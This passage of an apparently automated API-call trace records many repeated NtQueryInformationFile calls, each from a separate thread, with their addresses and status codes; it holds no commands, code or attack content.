FileHandle=0x194, IoStatusBlock=0x35df928, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df928, FileInformation=0x210e20) returned 0x0 Thread: id = 1940 os_tid = 0xb48 [0166.122] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fbe0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fbe0, FileInformation=0x210e20) returned 0x0 Thread: id = 1941 os_tid = 0x5bc [0166.124] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfbb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfbb0, FileInformation=0x210e20) returned 0x0 Thread: id = 1942 os_tid = 0x6b8 [0166.126] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fb90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fb90, FileInformation=0x210e20) returned 0x0 Thread: id = 1943 os_tid = 0x2dc [0166.128] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fd90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fd90, FileInformation=0x210e20) returned 0x0 Thread: id = 1944 os_tid = 0x158 [0166.130] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fac0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fac0, FileInformation=0x210e20) returned 0x0 Thread: id = 1945 os_tid = 0x6cc [0166.132] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df9e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df9e0, FileInformation=0x210e20) returned 0x0 Thread: id = 1946 os_tid = 0x694 [0166.134] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fa58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fa58, FileInformation=0x210e20) returned 0x0 Thread: id = 1947 os_tid = 0x6d8 [0166.136] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f8a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f8a0, FileInformation=0x210e20) returned 0x0 Thread: id = 1948 os_tid = 0x87c [0166.138] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff900, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff900, FileInformation=0x210e20) returned 0x0 Thread: id = 1949 os_tid = 0xb88 [0166.139] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fd50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fd50, FileInformation=0x210e20) returned 0x0 Thread: id = 1950 os_tid = 0xb8c [0166.141] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bff68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bff68, FileInformation=0x210e20) returned 0x0 Thread: id = 1951 os_tid = 0x700 [0166.143] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fc08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fc08, FileInformation=0x210e20) returned 0x0 Thread: id = 1952 os_tid = 0x6f0 [0166.145] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df978, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df978, FileInformation=0x210e20) returned 0x0 Thread: id = 1953 os_tid = 0x130 [0166.147] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf908, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf908, FileInformation=0x210e20) returned 0x0 Thread: id = 1954 os_tid = 0x754 [0166.150] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffa38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffa38, FileInformation=0x210e20) returned 0x0 Thread: id = 1955 os_tid = 0x72c [0166.152] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffc18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffc18, FileInformation=0x210e20) returned 0x0 Thread: id = 1956 os_tid = 0x748 [0166.154] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f940, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f940, FileInformation=0x210e20) returned 0x0 Thread: id = 1957 os_tid = 0x928 [0166.156] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373ff38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373ff38, FileInformation=0x210e20) returned 0x0 Thread: id = 1958 os_tid = 0xcc [0166.158] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fdd0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fdd0, FileInformation=0x210e20) returned 0x0 Thread: id = 1959 os_tid = 0xd0 [0166.160] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369ff60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369ff60, FileInformation=0x210e20) returned 0x0 Thread: id = 1960 os_tid = 0xd4 [0166.162] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fe58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fe58, FileInformation=0x210e20) returned 0x0 Thread: id = 1961 os_tid = 0xd8 [0166.164] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fc90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fc90, FileInformation=0x210e20) returned 0x0 Thread: id = 1962 os_tid = 0xdc [0166.166] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fe70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fe70, FileInformation=0x210e20) returned 0x0 Thread: id = 1963 os_tid = 0xe0 [0166.168] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fb60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fb60, FileInformation=0x210e20) returned 0x0 Thread: id = 1964 os_tid = 0xe4 [0166.170] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fd40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fd40, FileInformation=0x210e20) returned 0x0 Thread: id = 1965 os_tid = 0xe8 [0166.172] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f970, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f970, FileInformation=0x210e20) returned 0x0 Thread: id = 1966 os_tid = 0xec [0166.174] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fad8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fad8, FileInformation=0x210e20) returned 0x0 Thread: id = 1967 os_tid = 0x9d8 [0166.176] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359ff10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359ff10, FileInformation=0x210e20) returned 0x0 Thread: id = 1968 os_tid = 0x898 [0166.178] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fa88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fa88, FileInformation=0x210e20) returned 0x0 Thread: id = 1969 os_tid = 0x48c [0166.180] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f7a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f7a8, FileInformation=0x210e20) returned 0x0 Thread: id = 1970 os_tid = 0x6a4 [0166.182] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fdd8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fdd8, FileInformation=0x210e20) returned 0x0 Thread: id = 1971 os_tid = 0x20c [0166.189] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f828, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f828, FileInformation=0x210e20) returned 0x0 Thread: id = 1972 os_tid = 0x630 [0166.191] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fdf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fdf8, FileInformation=0x210e20) returned 0x0 Thread: id = 1973 os_tid = 0x5e4 [0166.193] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f7a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f7a8, FileInformation=0x210e20) returned 0x0 Thread: id = 1974 os_tid = 0xb28 [0166.194] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff7d8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff7d8, FileInformation=0x210e20) returned 0x0 Thread: id = 1975 os_tid = 0xb20 [0166.196] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fd90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fd90, FileInformation=0x210e20) returned 0x0 Thread: id = 1976 os_tid = 0x704 [0166.198] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f8c0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f8c0, FileInformation=0x210e20) returned 0x0 Thread: id = 1977 os_tid = 0x568 [0166.200] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fd48, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fd48, FileInformation=0x210e20) returned 0x0 Thread: id = 1978 os_tid = 0x5ac [0166.203] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f8f0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f8f0, FileInformation=0x210e20) returned 0x0 Thread: id = 1979 os_tid = 0x908 [0166.205] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfec8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfec8, FileInformation=0x210e20) returned 0x0 Thread: id = 1980 os_tid = 0x888 [0166.207] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfbd0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfbd0, FileInformation=0x210e20) returned 0x0 Thread: id = 1981 os_tid = 0x544 [0166.208] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359ff60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359ff60, FileInformation=0x210e20) returned 0x0 Thread: id = 1982 os_tid = 0x76c [0166.210] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369ff28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369ff28, FileInformation=0x210e20) returned 0x0 Thread: id = 1983 os_tid = 0xa9c [0166.213] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fd60, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fd60, FileInformation=0x210e20) returned 0x0 Thread: id = 1984 os_tid = 0x114 [0166.215] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fab8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fab8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 1985 os_tid = 0x5b8 [0166.217] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf8f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf8f8, FileInformation=0x210e20) returned 0x0 Thread: id = 1986 os_tid = 0x814 [0166.219] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fd50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fd50, FileInformation=0x210e20) returned 0x0 Thread: id = 1987 os_tid = 0x834 [0166.221] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fdd8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fdd8, FileInformation=0x210e20) returned 0x0 Thread: id = 1988 os_tid = 0x884 [0166.224] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fd40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fd40, FileInformation=0x210e20) returned 0x0 Thread: id = 1989 os_tid = 0x5d4 [0166.225] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df838, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df838, FileInformation=0x210e20) returned 0x0 Thread: id = 1990 os_tid = 0x340 [0166.228] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365feb8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365feb8, FileInformation=0x210e20) returned 0x0 Thread: id = 1991 os_tid = 0x810 [0166.230] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fc80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fc80, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 1992 os_tid = 0x830 [0166.232] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfd58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfd58, FileInformation=0x210e20) returned 0x0 Thread: id = 1993 os_tid = 0x880 [0166.234] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fe98, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fe98, FileInformation=0x210e20) returned 0x0 Thread: id = 1994 os_tid = 0xae4 [0166.236] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fa58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fa58, FileInformation=0x210e20) returned 0x0 Thread: id = 1995 os_tid = 0x570 [0166.239] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfc78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfc78, FileInformation=0x210e20) returned 0x0 Thread: id = 1996 os_tid = 0xb40 [0166.241] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffe18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffe18, FileInformation=0x210e20) returned 0x0 Thread: id = 1997 os_tid = 0x5f4 [0166.246] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffad8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffad8, FileInformation=0x210e20) returned 0x0 Thread: id = 1998 os_tid = 0xbb8 [0166.248] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f958, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f958, FileInformation=0x210e20) returned 0x0 Thread: id = 1999 os_tid = 0x598 [0166.250] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf788, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf788, FileInformation=0x210e20) returned 0x0 Thread: id = 2000 os_tid = 0x4e4 [0166.252] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fdf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fdf8, FileInformation=0x210e20) returned 0x0 Thread: id = 2001 os_tid = 0xbfc [0166.257] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fda0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fda0, FileInformation=0x210e20) returned 0x0 Thread: id = 2002 os_tid = 0x80c [0166.259] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fc38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fc38, FileInformation=0x210e20) returned 0x0 Thread: id = 2003 os_tid = 0xbf8 [0166.261] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f8f0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f8f0, FileInformation=0x210e20) returned 0x0 Thread: id = 2004 os_tid = 0x524 [0166.263] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfab8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfab8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 2005 os_tid = 0x674 [0166.265] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfd18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfd18, FileInformation=0x210e20) returned 0x0 Thread: id = 2006 os_tid = 0x4a0 [0166.267] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fd28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fd28, FileInformation=0x210e20) returned 0x0 Thread: id = 2007 os_tid = 0x5d8 [0166.269] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fe80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fe80, FileInformation=0x210e20) returned 0x0 Thread: id = 2008 os_tid = 0x69c [0166.271] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffa68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffa68, FileInformation=0x210e20) returned 0x0 Thread: id = 2009 os_tid = 0xb74 [0166.273] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf920, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf920, FileInformation=0x210e20) returned 0x0 Thread: id = 2010 os_tid = 0x6a8 [0166.275] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf948, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf948, FileInformation=0x210e20) returned 0x0 Thread: id = 2011 os_tid = 0xb68 [0166.277] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f900, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f900, FileInformation=0x210e20) returned 0x0 Thread: id = 2012 os_tid = 0x758 [0166.279] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f8f8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f8f8, FileInformation=0x210e20) returned 0x0 Thread: id = 2013 os_tid = 0x3d4 [0166.281] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfa80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfa80, FileInformation=0x210e20) returned 0x0 Thread: id = 2014 os_tid = 0x484 [0166.283] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f7f0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f7f0, FileInformation=0x210e20) returned 0x0 Thread: id = 2015 os_tid = 0xb4c [0166.284] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfc10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfc10, FileInformation=0x210e20) returned 0x0 Thread: id = 2016 os_tid = 0xa1c [0166.286] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fd28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fd28, FileInformation=0x210e20) returned 0x0 Thread: id = 2017 os_tid = 0x2ac [0166.288] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fba8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fba8, FileInformation=0x210e20) returned 0x0 Thread: id = 2018 os_tid = 0xa8c [0166.290] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f8a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f8a8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 2019 os_tid = 0x68c [0166.292] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfd10, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfd10, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 2020 os_tid = 0x388 [0166.294] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367faa8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367faa8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 2021 os_tid = 0xa50 [0166.296] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f9a0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f9a0, FileInformation=0x210e20) returned 0x0 Thread: id = 2022 os_tid = 0x75c [0166.301] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f8e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f8e0, FileInformation=0x210e20) returned 0x0 Thread: id = 2023 os_tid = 0x240 [0166.303] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f938, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f938, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 2024 os_tid = 0x320 [0166.305] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fe88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fe88, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 2025 os_tid = 0x3b4 [0166.307] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f7e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f7e0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 2026 os_tid = 0x760 [0166.309] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fea8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fea8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 2027 os_tid = 0xb00 [0166.314] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff9f0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff9f0, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 2028 os_tid = 0x7fc [0166.316] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fa78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fa78, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 2029 os_tid = 0xb18 [0166.318] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fb78, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fb78, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 2030 os_tid = 0xa68 [0166.320] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fa68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fa68, FileInformation=0x210e20) returned 0x0 Thread: id = 2031 os_tid = 0x224 [0166.322] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f9e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f9e8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 2032 os_tid = 0x2c4 [0166.324] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fae8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fae8, FileInformation=0x210e20) returned 0xc0000002 Thread: id = 2033 os_tid = 0x24c [0166.326] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f818, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f818, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 2034 os_tid = 0x4e8 [0166.327] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfd80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfd80, FileInformation=0x210e20) returned 0x0 Thread: id = 2035 os_tid = 0x220 [0166.329] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fab8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fab8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 2036 os_tid = 0xb04 [0166.332] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f850, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f850, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 2037 os_tid = 0x180 [0166.333] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365ff00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365ff00, FileInformation=0x210e20) returned 0x0 Thread: id = 2038 os_tid = 0x53c [0166.335] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fbc0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fbc0, FileInformation=0x210e20) returned 0x0 Thread: id = 2039 os_tid = 0x5b4 [0166.337] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fa18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fa18, FileInformation=0x210e20) returned 0x0 Thread: id = 2040 os_tid = 0x614 [0166.339] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfed8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfed8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 2041 os_tid = 0x690 [0166.341] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f948, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f948, FileInformation=0x210e20) returned 0x0 Thread: id = 2042 os_tid = 0x440 [0166.343] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f9e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f9e0, FileInformation=0x210e20) returned 0x0 Thread: id = 2043 os_tid = 0x7d8 [0166.345] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff818, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff818, FileInformation=0x210e20) returned 0x0 Thread: id = 2044 os_tid = 0xa60 [0166.347] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfe40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfe40, FileInformation=0x210e20) returned 0x0 Thread: id = 2045 os_tid = 0xb24 [0166.349] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f820, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f820, FileInformation=0x210e20) returned 0x0 Thread: id = 2046 os_tid = 0x878 [0166.351] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fa50, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fa50, FileInformation=0x210e20) returned 0x0 Thread: id = 2047 os_tid = 0xb1c [0166.353] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df868, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df868, FileInformation=0x210e20) returned 0x0 Thread: id = 2048 os_tid = 0xb08 [0166.355] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f7e0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f7e0, 